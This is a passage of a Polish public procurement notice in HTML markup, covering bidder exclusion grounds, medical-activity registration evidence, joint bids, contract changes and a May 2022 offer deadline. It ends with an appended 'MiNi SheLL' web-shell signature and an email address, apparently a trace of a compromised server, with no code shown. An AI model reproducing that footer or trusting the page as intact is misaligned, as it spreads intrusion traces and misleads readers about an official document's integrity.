działalności leczniczej (Dz. U. z 2020 r. poz. 295 t.j. z póżn. zm.) , złożone na<br/>odrębnym dokumencie na wezwanie Zamawiającego.Zamawiający dokona oceny braku<br/>podstaw do wykluczenia i spełnienia warunków udziału w postępowaniu na podstawie<br/>załączonych do oferty dokumentów i oświadczeń w formie spełnia, nie spełnia. Oferta<br/>Wykonawcy, który nie spełnia warunków udziału w postępowaniu lub który nie wykazał braku<br/>podstaw wykluczenia zostanie odrzucona na podstawie art 226 ust 1 pkt 2) ppk a) i b).1.2.<br/>Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni,<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych tj: a) aktualnego wpisu do<br/>rejestru podmiotów wykonujących działalność leczniczą - zgodnie z art. 100 ustawy z dnia 15<br/>kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2020 r. poz. 295 t.j. z póżn. zm.) ( w<br/>przypadku wskazania przez Wykonawcę w oświadczeniu, o którym mowa w Sekcji VII pkt. 1.2 a)<br/>danych nieumożliwiającym bezpłatny i ogólnodostępny dostęp do przedmiotowego dokumentu,<br/>zamawiający samodzielnie pobierze go z bazy danych). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.1. Do składanej oferty Wykonawca dołączy oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego w sekcji VII. Wzór oświadczenia stanowi załącznik nr 4 do SWZ. •	Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert, <br/>- art. 7 ust. 1 ustawy z 13 kwietnia 2022 o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835) <br/>•	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy <br/>z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>•	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	na podstawie art. 125 ust. 1 ustawy Pzp – dołączenia do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu – zgodnie ze wzorem stanowiącym załącznik nr 4 do SWZ<br/>b)	dokument potwierdzający wpis do rejestru podmiotów wykonujących działalność leczniczą- - zgodnie z art. 100 ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2021 r. poz. 1773 j.t. z póżn. zm.), złożone na odrębnym dokumencie na wezwanie Zamawiającego.<br/>Zamawiający dokona oceny braku podstaw do wykluczenia i spełnienia warunków udziału <br/>w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń w formie spełnia, nie spełnia. Oferta Wykonawcy, który nie spełnia warunków udziału w postępowaniu lub który nie wykazał braku podstaw wykluczenia zostanie odrzucona na podstawie art 226 ust 1 pkt 2) ppk a) i b).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 2. W przypadku, o którym<br/>mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. 3. Oferta musi być podpisana w taki sposób, by prawnie<br/>zobowiązywała wszystkich Wykonawców występujących wspólnie. 4. W przypadku wspólnego<br/>ubiegania się przez Wykonawców o udzielenie zamówienia dokumenty i oświadczenia<br/>wskazane w sekcji VIII pkt. 1 składa również Wykonawca wspólnie ubiegający się o udzielnie<br/>zamówienia. Postanowienia sekcji VIII ust. 1.2-1.5 stosuje się odpowiednio. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Umowa w sprawie zamówienia publicznego wymaga, pod rygorem nieważności, zachowania<br/>formy pisemnej. 2. Projektowane postanowienia określa wzór umowy – załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://slaska-policja.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-13 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełna dokumentacja postępowania zawarta jest w SWZ wraz z załącznikami do<br/>postępowania Załącznik nr 1 do SWZ Formularz ofertowy Wykonawcy.<br/>Zał. nr 2 do SWZ Wzór umowy Zał. nr 3 do SWZ Oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału<br/>w postępowaniu Zał. nr 4 do SWZ Wykaz narzędzi Zał. nr 5 do SWZ Zobowiązanie innego podmiotu .

Creat By MiNi SheLL
Email: jattceo@gmail.com